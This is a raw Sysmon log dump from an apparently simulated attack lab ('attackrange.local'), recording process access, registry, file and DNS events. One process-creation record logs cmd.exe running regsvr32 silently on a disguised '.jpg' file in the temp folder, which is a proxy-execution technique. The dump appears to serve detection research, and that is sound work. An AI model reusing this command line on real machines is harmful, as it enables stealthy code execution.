22:12:49.046{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360797Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360796Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-36e1-6013-a503-000000001100}5088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360795Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36e1-6013-a503-000000001100}5088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27) 154100x8000000000000000360794Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.050{8e433fbf-36e1-6013-a503-000000001100}5088C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s %%temp%%\shell32.jpg" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 13241300x8000000000000000360793Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:49.046{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 11241100x8000000000000000360792Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:12:47.186 11241100x8000000000000000360791Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:12:47.186 10341000x8000000000000000360790Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.999{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360789Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.999{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361126Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:50.140{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361125Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:50.140{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3700-000000001100}2692C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361124Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:50.140{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+1e231|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032903Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E0-6013-8600-00000000A401}32205052C:\Windows\system32\taskhostw.exe{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032902Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E0-6013-8600-00000000A401}32205052C:\Windows\system32\taskhostw.exe{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032901Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032900Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032899Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032898Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30363108C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032897Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30363108C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032896Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30363108C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032895Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30363108C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032894Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032893Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032892Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032891Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:50.110{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000032904Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.535{00000000-0000-0000-0000-000000000000}2076raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.52.133;<unknown process> 10341000x8000000000000000361135Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-339f-6013-c402-000000001100}3448C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361134Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361133Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361132Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-337e-6013-9502-000000001100}7612C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361131Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-337c-6013-8e02-000000001100}1960C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361130Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-3380-6013-9a02-000000001100}7332C:\Windows\System32\MicrosoftEdgeCP.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361129Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-337d-6013-9102-000000001100}7292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361128Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-339a-6013-c202-000000001100}10132C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361127Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:52.688{8e433fbf-337b-6013-8402-000000001100}16561008C:\Windows\Explorer.EXE{8e433fbf-3381-6013-9d02-000000001100}8712C:\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361136Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:53.375{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032910Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:57.054{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032909Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 